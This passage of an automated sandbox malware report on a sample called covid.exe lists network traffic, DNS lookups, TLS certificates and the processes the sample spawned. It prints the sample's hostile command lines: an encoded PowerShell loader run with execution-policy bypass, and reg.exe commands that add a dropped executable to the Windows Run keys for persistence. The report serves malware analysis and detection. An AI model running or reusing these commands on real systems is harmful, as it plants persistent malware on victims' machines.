                                                                                                                                                                    Apr 1, 2021 08:04:47.476510048 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476530075 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476542950 CEST44349734172.217.168.2192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.476687908 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.476721048 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.529241085 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.529334068 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.530327082 CEST49735443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.546705961 CEST49734443192.168.2.3172.217.168.2
                                                                                                                                                                    Apr 1, 2021 08:04:47.546734095 CEST49735443192.168.2.3172.217.168.2

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    Apr 1, 2021 08:04:39.050292969 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.378832102 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.436115026 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.640542030 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.689522982 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:40.822742939 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:40.881469011 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.165626049 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.181220055 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.219666004 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.238560915 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.410459042 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.464803934 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.496211052 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.538640022 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.552088976 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.611205101 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:41.814378977 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:41.860580921 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.223097086 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:47.286909103 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.418764114 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                    Apr 1, 2021 08:04:47.496689081 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                    Apr 1, 2021 08:04:47.520133972 CEST5303453192.168.2.38.8.8.8

DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Apr 1, 2021 08:04:36.352870941 CEST | 192.168.2.3 | 8.8.8.8 | 0xb74f | Standard query (0) | www.who.int | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:37.817792892 CEST | 192.168.2.3 | 8.8.8.8 | 0x16c7 | Standard query (0) | www.who.int | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:38.244921923 CEST | 192.168.2.3 | 8.8.8.8 | 0x7923 | Standard query (0) | use.fontawesome.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:38.682712078 CEST | 192.168.2.3 | 8.8.8.8 | 0x1bc6 | Standard query (0) | cdn.who.int | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:38.991694927 CEST | 192.168.2.3 | 8.8.8.8 | 0x9aa3 | Standard query (0) | s7.addthis.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:39.001890898 CEST | 192.168.2.3 | 8.8.8.8 | 0xd4ab | Standard query (0) | platform.twitter.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:40.640542030 CEST | 192.168.2.3 | 8.8.8.8 | 0x1297 | Standard query (0) | www.youtube.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:40.822742939 CEST | 192.168.2.3 | 8.8.8.8 | 0xdea7 | Standard query (0) | z.moatads.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:41.181220055 CEST | 192.168.2.3 | 8.8.8.8 | 0xc34b | Standard query (0) | www.clarity.ms | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:41.410459042 CEST | 192.168.2.3 | 8.8.8.8 | 0x34af | Standard query (0) | v1.addthisedge.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:41.496211052 CEST | 192.168.2.3 | 8.8.8.8 | 0x11c4 | Standard query (0) | m.addthis.com | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:41.538640022 CEST | 192.168.2.3 | 8.8.8.8 | 0x25fd | Standard query (0) | c.clarity.ms | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:47.223097086 CEST | 192.168.2.3 | 8.8.8.8 | 0xa541 | Standard query (0) | googleads.g.doubleclick.net | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:47.418764114 CEST | 192.168.2.3 | 8.8.8.8 | 0x83ae | Standard query (0) | static.doubleclick.net | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Apr 1, 2021 08:04:36.408957958 CEST | 8.8.8.8 | 192.168.2.3 | 0xb74f | No error (0) | www.who.int | www.who.int.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:37.875169039 CEST | 8.8.8.8 | 192.168.2.3 | 0x16c7 | No error (0) | www.who.int | www.who.int.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:38.290719986 CEST | 8.8.8.8 | 192.168.2.3 | 0x7923 | No error (0) | use.fontawesome.com | fontawesome-cdn.fonticons.netdna-cdn.com | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:38.290719986 CEST | 8.8.8.8 | 192.168.2.3 | 0x7923 | No error (0) | fontawesome-cdn.fonticons.netdna-cdn.com | | 23.111.9.35 | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:38.739806890 CEST | 8.8.8.8 | 192.168.2.3 | 0x1bc6 | No error (0) | cdn.who.int | cdn.who.int.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:39.047735929 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4ab | No error (0) | platform.twitter.com | platform.twitter.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:39.047735929 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4ab | No error (0) | platform.twitter.map.fastly.net | | 199.232.136.157 | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:39.050292969 CEST | 8.8.8.8 | 192.168.2.3 | 0x9aa3 | No error (0) | s7.addthis.com | s8.addthis.com | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:39.050292969 CEST | 8.8.8.8 | 192.168.2.3 | 0x9aa3 | No error (0) | s8.addthis.com | ds-s7.addthis.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:40.689522982 CEST | 8.8.8.8 | 192.168.2.3 | 0x1297 | No error (0) | www.youtube.com | youtube-ui.l.google.com | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:40.881469011 CEST | 8.8.8.8 | 192.168.2.3 | 0xdea7 | No error (0) | z.moatads.com | wildcard.moatads.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.238560915 CEST | 8.8.8.8 | 192.168.2.3 | 0xc34b | No error (0) | www.clarity.ms | clarity.azurefd.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.238560915 CEST | 8.8.8.8 | 192.168.2.3 | 0xc34b | No error (0) | clarity.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.464803934 CEST | 8.8.8.8 | 192.168.2.3 | 0x34af | No error (0) | v1.addthisedge.com | v1.addthisedge.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.552088976 CEST | 8.8.8.8 | 192.168.2.3 | 0x11c4 | No error (0) | m.addthis.com | m.addthisedge.com | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.552088976 CEST | 8.8.8.8 | 192.168.2.3 | 0x11c4 | No error (0) | m.addthisedge.com | ds-m.addthisedge.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.611205101 CEST | 8.8.8.8 | 192.168.2.3 | 0x25fd | No error (0) | c.clarity.ms | c.msn.com | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:41.611205101 CEST | 8.8.8.8 | 192.168.2.3 | 0x25fd | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) |
| Apr 1, 2021 08:04:47.286909103 CEST | 8.8.8.8 | 192.168.2.3 | 0xa541 | No error (0) | googleads.g.doubleclick.net | | 172.217.168.2 | A (IP address) | IN (0x0001) |
| Apr 1, 2021 08:04:47.496689081 CEST | 8.8.8.8 | 192.168.2.3 | 0x83ae | No error (0) | static.doubleclick.net | static-doubleclick-net.l.google.com | | CNAME (Canonical name) | IN (0x0001) |

HTTPS Packets

| Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 1, 2021 08:04:38.866100073 CEST | 23.111.9.35 | 443 | 192.168.2.3 | 49708 | CN=*.fontawesome.com, O=Fonticons Inc, L=Bentonville, ST=Arkansas, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Fri Nov 13 01:00:00 CET 2020 | Wed Dec 15 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | | |
| | | | | | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Fri Nov 10 01:00:00 CET 2006 | Mon Nov 10 01:00:00 CET 2031 | | |
| Apr 1, 2021 08:04:38.867270947 CEST | 23.111.9.35 | 443 | 192.168.2.3 | 49709 | CN=*.fontawesome.com, O=Fonticons Inc, L=Bentonville, ST=Arkansas, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Fri Nov 13 01:00:00 CET 2020 | Wed Dec 15 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 | | |
| | | | | | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Fri Nov 10 01:00:00 CET 2006 | Mon Nov 10 01:00:00 CET 2031 | | |
| Apr 1, 2021 08:04:39.129425049 CEST | 199.232.136.157 | 443 | 192.168.2.3 | 49712 | CN=platform.twitter.com, OU=Twitter Security, O="Twitter, Inc.", L=San Francisco, ST=California, C=US | CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Aug 13 02:00:00 CEST 2020 | Wed Aug 18 14:00:00 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Tue Oct 22 14:00:00 CEST 2013 | Sun Oct 22 14:00:00 CEST 2028 | | |
| Apr 1, 2021 08:04:39.130176067 CEST | 199.232.136.157 | 443 | 192.168.2.3 | 49713 | CN=platform.twitter.com, OU=Twitter Security, O="Twitter, Inc.", L=San Francisco, ST=California, C=US | CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Aug 13 02:00:00 CEST 2020 | Wed Aug 18 14:00:00 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Tue Oct 22 14:00:00 CEST 2013 | Sun Oct 22 14:00:00 CEST 2028 | | |
| Apr 1, 2021 08:04:47.474281073 CEST | 172.217.168.2 | 443 | 192.168.2.3 | 49735 | CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Thu Mar 11 15:54:02 CET 2021 | Thu Jun 03 16:54:01 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | | |
| Apr 1, 2021 08:04:47.476530075 CEST | 172.217.168.2 | 443 | 192.168.2.3 | 49734 | CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Thu Mar 11 15:54:02 CET 2021 | Thu Jun 03 16:54:01 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c |
| | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | | |

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

Start time: 08:04:22
Start date: 01/04/2021
Path: C:\Users\user\Desktop\covid.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\covid.exe'
Imagebase: 0xc70000
File size: 5253560 bytes
MD5 hash: A990C03D14BEF241E880D6167FA5A6AA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

                                                                                                                                                                    General

Start time: 08:04:24
Start date: 01/04/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                                                                                                                    Commandline:'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Imagebase:0x7ff785e30000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:high

General

Start time:08:04:25
Start date:01/04/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:04:34
Start date:01/04/2021
Path:C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
Imagebase:0x7ff6e4bd0000
File size:823560 bytes
MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:04:35
Start date:01/04/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
Imagebase:0xc70000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:04:42
Start date:01/04/2021
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Imagebase:0x7ff714f20000
File size:72704 bytes
MD5 hash:E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:08:04:44
Start date:01/04/2021
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Imagebase:0x7ff714f20000
File size:72704 bytes
MD5 hash:E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:08:04:46
Start date:01/04/2021
Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Imagebase:0x7ff686040000
File size:274944 bytes
MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:08:04:47
Start date:01/04/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:04:48
Start date:01/04/2021
Path:C:\Windows\System32\mobsync.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\mobsync.exe
Imagebase:0x7ff7a9780000
File size:97792 bytes
MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:08:04:51
Start date:01/04/2021
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
Imagebase:0x7ff6f14c0000
File size:494488 bytes
MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:08:04:55
Start date:01/04/2021
Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Imagebase:0x7ff6fe100000
File size:274944 bytes
MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:08:04:56
Start date:01/04/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6b2800000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:04:57
Start date:01/04/2021
Path:C:\Windows\System32\mobsync.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\mobsync.exe
Imagebase:0x7ff7a9780000
File size:97792 bytes
MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:00
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
                                                                                                                                                                    Imagebase:0x7ff6f14c0000
                                                                                                                                                                    File size:494488 bytes
                                                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:04
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff7e3d60000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:05
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:06
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Imagebase:0x7ff7a9780000
                                                                                                                                                                    File size:97792 bytes
                                                                                                                                                                    MD5 hash:99D4E13A3EAD4460C6E102E905E25A5C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:11
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
                                                                                                                                                                    Imagebase:0x7ff6f14c0000
                                                                                                                                                                    File size:494488 bytes
                                                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:13
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\buyonegetone.exe'
                                                                                                                                                                    Imagebase:0x7ff7e3d60000
                                                                                                                                                                    File size:274944 bytes
                                                                                                                                                                    MD5 hash:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:13
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6b2800000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    General

                                                                                                                                                                    Start time:08:05:14
                                                                                                                                                                    Start date:01/04/2021
                                                                                                                                                                    Path:C:\Windows\System32\mobsync.exe
                                                                                                                                                                    Wow64 process (32bit):false
